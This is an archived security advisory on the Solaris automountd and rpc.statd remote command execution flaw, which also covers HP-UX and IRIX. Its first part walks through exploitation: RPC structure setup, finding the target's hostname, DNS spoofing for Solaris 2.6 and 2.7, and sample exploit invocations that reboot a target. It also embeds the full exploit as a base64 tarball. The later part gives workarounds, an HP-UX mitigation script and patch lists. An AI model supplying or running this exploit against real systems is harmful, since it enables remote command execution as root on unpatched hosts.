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Vulnerability automountd Affected Solaris 2.5, 2.5.1, 2.6, 2.7Beta (X86 and SPARC), HP-9000 Series 700/800 HP-UX releases 10.X and 11.00, IRIX Description Corruptio Optimi Pessima found following. Back in 1995, a vulnerability was discovered and a new world of buggy software born. This particular bug, would be conceived when Sun Microsystems made the foolish decision to ship Solaris 2.5 to customers. Since then, it has been a downhill roller coaster for the boys and girls at SUN. Now, not only is 2.5 affected, but 2.5.1 stock, 2.5.1 patched, 2.6 and 2.7 are all affected as well. When exploit code for the local automountd problem was leaked a few YEARS ago, SUN developed a patch and labeled it #104654-05. However, intrestingly enough, even after the patch was released, this bug could still be exploited quite trivially. What SUN decided to do, was remove the 'popen' call and put in its place an 'execve' call. Absolutely brilliant. Did they forget that the variable holding the program and arguments to be execued could still be set by issuing a AUTOFS_MOUNT call to automountd? Or, is this a case of job security by one of Sun's engineers? We certainly feel it is the latter. Either way, not only is this bug local, but it is remote too! And, not only is it remote, but it is started by default as well! Now, getting back to the bug at hand, a few things have to be established before this can be exploited. First of all, to remotely exploit this bug, it becomes two-pronged. Meaning, we are now going to introduce another remote bug in the SUN Solaris operating system that when combined with the previous, create a lethal combination. This new bug, located in rpc.statd which is also started by default (imagine that!), allows for remote packets to be bounced to the local Operating System. Looking back at the details of automountd, we remember that it cannot accept packets on UDP or TCP protocols. But, it can accept packets on the TLI protocol, which rpc.statd happens to forward to, allowing us to remotely execute commands by sending our packets to rpc.statd. So, with all this in mind, if we send two RPC packets to rpc.statd on Solaris 2.5, 2.5.1 stock, 2.5.1 patched, 2.6, or 2.7, with the SM_MON and SM_NOTIFY commands, rpc.statd will happily forward the packet on to the local operating system's automountd daemon. Variables we will have to setup will be the following: struct mon monr; struct status stat; memset(&monr, 0, sizeof(struct mon)); monr.mon_id.my_id.my_name = cache; monr.mon_id.my_id.my_prog = (unsigned long)AUTOFS_PROG; monr.mon_id.my_id.my_proc = (unsigned long)AUTOFS_MOUNT; mon_id.my_id.my_name will be our cache, which we will be using to tell rpc.statd where to forward the packets to. The cache of the remote system can be found by establishing a connection to port 23, or port 21 of the system. The cache will usually appear inside parentheseis, and will be the hostname of the machine. Another example of obtaining the cache, would be to lookup the ip address of the machine and use the hostname that comes back. For example, for pathetic.sun.com, you could try 'pathetic' or 'pathetic.sun.com', and it will be a pretty safe bet that you will pick the correct hostname. mon_id.my_id.my_prog will be the variable AUTOFS_PROG telling rpc.statd which RPC service to connect to. mon_id.my_id.my_proc will be the variable AUTOFS_MOUNT telling rpc.statd to tell automountd that we want a AUTOFS_MOUNT request. Further variables to setup: monr.mon_id.my_id.my_vers = 1; /* For Solaris 2.5, 2.5.1 */ or monr.mon_id.my_id.my_vers = 2; /* For Solaris 2.6, and 2.7 */ monr.mon_id.mon_name = command; stat.mon_name = command; monr.mon_id.mon_name and stat.mon_name will both contain the program to execute on the remote system. Now, with those variables setup, we can send off our RPC packets to the remote system. However, to complicate things more, we must modify our tekneeq of exploiting this bug, for it to succeed on 2.6 and 2.7. Because SUN implements a new function called SMHASH in rpc.statd on Solaris 2.6 and 2.7, we will now have to involve DNS spoofing to acomplish executing our command. Because of the way SMHASH works and the way RPC arguments are encoded, our command is what SMHASH attempts to lookup in its address tables once rpc.statd receives our packet. If SMHASH cannot detect if our command is a valid address, it will not forward the packet. However, if we DNS spoof our command off the Primary and Secondary nameservers of the remote system, SMHASH will return true for finding the command as an address and our packet will be forwarded. If you wish to test this bug without DNS spoofing, you can also modify the /etc/hosts file on the Solaris system and put in the command you want to execute (without arguments) as a hostname with an ip address, and it will accomplish the same affect. Examples ======== If pathetic.sun.com were a Solaris 2.7 machine with pathetic as its hostname, and a vulnerable Primary name server, an exploit attempt would look like this: Execute commands to spoof reboot off Primary NS here ./amountdexp pathetic.sun.com pathetic reboot 1 If pathetic.sun.com were a Solaris 2.5.1 machine with pathetic as its hostname, an exploit attempt would look like this: ./amountdexp pathetic.sun.com pathetic reboot 0 Exploit code for this vulnerability can be easily obtained from the following URL) and below in MIME code (note that in order to work you must DNS spoof attack): http://www.attrition.org/hosted/cop/index.html Mime code of exploit: --- Content-Type: application/octet-stream; name="automountd.tar.gz" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="automountd.tar.gz" Content-MD5: jN/hS35huap/9BPauGhnqw== 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 LJpIACgAAA== ----- Solution Well, check automountd manuals and see if you need it. It is obvious you'll kick off fro your script vulnerable program and wait for patch. If you really need automountd, check alternatives or ask Sun. Statd doesn't run as root in Solaris 7 so the automounter will ignore its requests. This change was made late in Solaris 7 development and did not make it into any external release. The easiest way to work around this problem quickly is runnign statd as a user other than root, to this end change in /etc/init.d/nfs.client as follows (but not on Solaris 7, where such a change may break statd). 28c28 < /usr/lib/nfs/statd > /dev/console 2>&1 --- > su daemon -c /usr/lib/nfs/statd > /dev/console 2>&1 (make sure you keep the links in /etc/rc?.d/[SK]*nfs.client pointing to /etc/init.d/nfs.client) and run: chown -R daemon /var/statmon chmod -R og-w /var/statmon Then stop and start lockd & statd. 2.5.1 is vulnerable for patch 104654-03 and below, not vulnerable once 104654-04 or higher applied. Perhaps the forged DNS would have made 2.5.1 104654-04+ vulnerable, but using the suggested test with "/etc/hosts" did not. As for HpUX, temporarily set: AutoFS = 0 in /etc/rc.config.d/nfsconf Doug Siebert added following. Here is a fix that will work on HP-UX 10.20 and 11.0 (11.0 not tested, but it should work) systems to block the automountd hole, so long as the loss of the executable map capability isn't a problem for you. See the comments in the script below which implements the fix. Please remember that if you install a patch that patches automountd, this fix will be wiped out, and you'll need to re-run this script to regain the protection. You will need either the HP ANSI C compiler or gcc for the script to work, the HP base/bundled C compiler can't generate position independant code. HP is adding/has added executable stack protection to HP-UX 11, and it is quite nice as it is implemented on a per binary basis. Just look at the man page for chatr(1) on a recently patched HP-UX 11 system. The only sad thing is that for "compatibility", the default is the old, arguably broken, behavior. When you see the tunable 'executable_stack' show up in /usr/conf/master.d/core-hpux, you'll want to set it to 0, which tells it to use the bit in the binary to permit/deny stack promotion. That should eventually become the default. #!/usr/bin/sh # # This closes the HP automountd/autofs hole by creating a libc stub that takes # over the libc popen(3) function. HP's automountd uses popen to implement # executable maps, which is a new feature of autofs versus the old style # automount, but is also the way this hole is exploited. Even after it is # fixed, if you don't use executable maps you will probably sleep better if you # know executable maps have been completely disabled. Obviously if you wish to # make use of executable maps, this fix is no good to you, and you'll have to # wait for an official patch from HP, and then keep your fingers crossed and # hope there isn't another hole waiting to be exploited. # # Douglas Siebert 10/23/99 (packaged as a script 12/24/99) # # Check that you are root if [ `whoami` != "root" ]; then echo "Must be root to run this script" exit 1 fi # Change to autofs directory for this script cd /usr/lib/netsvc/fs/autofs umask 077 # Create libc stub cat > libc.c << __EOF__ #include <stdio.h> #include <syslog.h> FILE * popen(const char *command, const char *type) { syslog(LOG_ALERT, "Exploit attempted on automountd/autofs hole"); return(NULL); } __EOF__ # Compile it with cc or gcc (hopefully you've got one of them) /usr/bin/cc -c libc.c -Ae +z || gcc -c libc.c -fpic || NOCC=1 if [ "$NOCC" ]; then echo "You must have the HP ANSI/C or gcc compiler on your system" rm -f libc.c exit 1 fi rm -f libc.c # Create the stub libc with the real libc as a dependency (HP hates when you # do this) I haven't yet tested this on HP-UX 11, but it should work. if [ -x /usr/lib/libc.2 ]; then rm -f libc.2 /usr/bin/ld -b -o libc.2 libc.o /usr/lib/libc.2 chmod 555 libc.2 else rm -f libc.1 /usr/bin/ld -b -o libc.1 libc.o /usr/lib/libc.1 chmod 555 libc.1 fi rm -f libc.o # Figure out where automountd is (there are at least two possibilities -- the # latest HP-UX 10.20 patches moved some stuff around and I don't know if the # automountd binary was in /usr/sbin before or not. But in HP-UX 11 it has # moved to /usr/lib/netsvc/fs/autofs. Hopefully those are the only possible # locations) if [ -x /usr/sbin/automountd ]; then AUTOMOUNTD_DIR=/usr/sbin elif [ -x /usr/lib/netsvc/fs/autofs/automountd ]; then AUTOMOUNTD_DIR=/usr/lib/netsvc/fs/autofs fi # Save unmodified automountd binary mv -f $AUTOMOUNTD_DIR/automountd $AUTOMOUNTD_DIR/automountd.ORIG # Set up new one to obey SHLIB_PATH cp -fp $AUTOMOUNTD_DIR/automountd.ORIG $AUTOMOUNTD_DIR/automountd.mod chatr +s enable $AUTOMOUNTD_DIR/automountd.mod >/dev/null # Create shell script to replace automountd cat > $AUTOMOUNTD_DIR/automountd << __EOF__ #!/usr/bin/sh export SHLIB_PATH=/usr/lib/netsvc/fs/autofs exec $AUTOMOUNTD_DIR/automountd.mod "\$@" __EOF__ chmod 555 $AUTOMOUNTD_DIR/automountd # Assume that if new libc.x exists, we succeeded... if [ -x libc.1 -o -x libc.2 ]; then echo "Success! You must now reboot if you have autofs running" exit 0 else echo "Something went wrong, but I have no idea what" exit 1 fi Anyway, here's a patch list for HpUX: For HP-UX release 11.00 apply PHNE_20371 For HP-UX release 10.20 apply PHNE_20628 With patches from SGI Security Advisory 19981005-01-PX installed, IRIX 6.2 and above ARE NOT vulnerable.